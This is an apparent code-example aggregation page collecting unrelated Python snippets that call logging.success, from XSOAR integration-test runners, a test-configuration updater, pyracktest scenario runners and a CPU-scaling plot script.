    run_test_logic handles the testing of the integration by triggering check_integration. afterwards
    it will check the status of the test and report success or add the failed test to the list of
    failed integrations.

    :param tests_settings: SettingsTester object which contains the test variables
    :param c: Client for connecting to XSOAR via demisto-py
    :param failed_playbooks: List of failed playbooks, additional failed playbooks will be added if
                             they failed.
    :param integrations: List of integrations being tested.
    :param playbook_id: ID of the test playbook being tested.
    :param succeed_playbooks: List of playbooks which have passed tests.
    :param test_message: Name of the playbook/integration being tested. This is reported back in the
                         build and used to print in the console the test being ran.
    :param test_options: Options being passed to the test. PID, Docker Threshold, Timeout, etc.
    :param slack: Slack client used for notifications.
    :param circle_ci: CircleCI token. Used to get name of dev who triggered the build.
    :param build_number: The build number of the CI run. Used in slack message.
    :param server_url: The FQDN of the server tests are being ran on.
    :param demisto_user: Username of the demisto user running the tests.
    :param demisto_pass: Password of the demisto user running the tests.
    :param build_name: Name of the build. (Nightly, etc.)
    :return: Boolean indicating if the test was successful.
    """
    status, inc_id = check_integration(c,
                                       server_url,
                                       demisto_user,
                                       demisto_pass,
                                       integrations,
                                       playbook_id,
                                       options=test_options)
    if status == PB_Status.COMPLETED:
        logging.success(f'PASS: {test_message} succeed')
        succeed_playbooks.append(playbook_id)

    elif status == PB_Status.NOT_SUPPORTED_VERSION:
        logging.info(f'PASS: {test_message} skipped - not supported version')
        succeed_playbooks.append(playbook_id)

    else:
        logging.error(f'Failed: {test_message} failed')
        playbook_id_with_mock = playbook_id
        playbook_id_with_mock += " (Mock Disabled)"
        failed_playbooks.append(playbook_id_with_mock)

    succeed = status in (PB_Status.COMPLETED, PB_Status.NOT_SUPPORTED_VERSION)

    return succeed
コード例 #30
0
def main():
    install_logging('Update Tests step.log', include_process_name=True)
    existing_test_playbooks = load_test_data_from_conf_json()
    with ProcessPool(max_workers=os.cpu_count(), max_tasks=100) as pool:
        for pack_name in os.listdir(PACKS_DIR):
            future_object = pool.schedule(generate_pack_tests_configuration,
                                          args=(pack_name, existing_test_playbooks), timeout=20)
            future_object.add_done_callback(update_new_conf_json)

    add_to_conf_json(NEW_CONF_JSON_OBJECT)
    logging.success(f'Added {len(NEW_CONF_JSON_OBJECT)} tests to the conf.json')
    logging.success(f'Added the following objects to the conf.json:\n{pformat(NEW_CONF_JSON_OBJECT)}')
コード例 #31
0
 def executeTestScenario(self):
     timeoutthread.TimeoutThread(self._timeoutInterval, self._testTimedOut)
     logging.info(
         "Test timer armed. Timeout in %(seconds)d seconds", dict(seconds=self._timeoutInterval))
     self._setUp()
     try:
         self._run()
     finally:
         self._tearDown()
     logging.success(
         "Test completed successfully, in '%(filename)s', with %(asserts)d successfull asserts",
         dict(filename=self._filename(), asserts=suite.successfulTSAssertCount()))
     print ".:1: Test passed"
コード例 #32
0
 def _run(self):
     logging.progress("Running test in '%(filename)s'", dict(filename=self._filename()))
     try:
         self._test.run()
         suite.anamnesis['testSucceeded'] = True
         logging.success(
             "Test completed successfully, in '%(filename)s', with %(asserts)d successfull asserts",
             dict(filename=self._filename(), asserts=suite.successfulTSAssertCount()))
         print ".:1: Test passed"
     except:
         suite.anamnesis['testFailed'] = True
         logging.exception("Test failed, in '%(filename)s'", dict(filename=self._filename()))
         suite.outputExceptionStackTrace()
         raise
コード例 #33
0
    ax.set_ylabel(r'$J\; [\, \frac{1}{\rm{s}}\, ]$',fontsize=18)
    ax.set_xlim(0.5, MAX_CPU + 0.5)
    ax.set_xticks(flows.keys())
    plt.title("# Simulations %d"%len(flows[ncpu]))
    #------------------ plot times
    ax2 = plt.subplot(212)
    ax2.plot(timedic.keys(), MT, "o-", lw=2, label='Mean', color='blue')
    ax2.errorbar(timedic.keys(), MT, yerr=ST, fmt='-o')
    ax2.set_xlabel(r'# cores',fontsize=18)
    ax2.set_ylabel(r'$T\; [  s ]$',fontsize=18)
    ax2.set_xticks(timedic.keys())
    ax2.set_xlim(0.5, MAX_CPU + 0.5)
    ax2.set_ylim( min( MT ) - max(ST)-0.1 , max( MT ) + max(ST) +0.1)
    #ax.legend(loc='best')
    ax2.grid()
    plt.tight_layout()
    logging.info("save file in cpu.png")
    plt.savefig("cpu.png")
    #plt.show()
    #########################################################################
    
    tolerance = 0.5# todo: this is to large 0.5
    logging.info("time elapsed %.2f [s]."%(time2-time1))
    logging.info("std_all = %.2f, tol=%.2f"%(std_all, tolerance))
    if std_all > tolerance:
        logging.success("%s exits with FAILURE std_all = %f > %f"%(argv[0], std_all, tolerance))
        exit(FAILURE)
    else:
        logging.info("%s exits with SUCCESS std_all = %f < %f"%(argv[0], std_all, tolerance))
        exit(SUCCESS)
コード例 #34
0
ファイル: main.py プロジェクト: Stratoscale/pyracktest
        popen = subprocess.Popen(
            ['python', _single, args.configurationFile, scenario, instance], close_fds=True)
        self._pids.append(popen.pid)
        result = popen.wait()
        self._pids.remove(popen.pid)
        took = time.time() - before
        self._results.append(dict(
            scenario=scenario, instance=instance, passed=result == 0, timeTook=took, host='localhost'))
        self._dumpLiveReport()


runner = Runner(args)
if args.listOnly:
    runner.printScenarios()
    sys.exit(0)
if args.parallel:
    runner.runParallel()
else:
    runner.runSequential()
runner.writeReport()
if runner.passedCount() < runner.total():
    logging.error(
        "%(failed)d tests Failed. %(passed)d/%(total)d Passed",
        dict(failed=runner.failedCount(), passed=runner.passedCount(), total=runner.total()))
    for scenario in runner.failed():
        logging.error("Failed scenario: %(scenario)s", dict(scenario=scenario))
    sys.exit(1)
else:
    logging.success(
        "Tests Passed: %(passed)d/%(total)d", dict(passed=runner.passedCount(), total=runner.total()))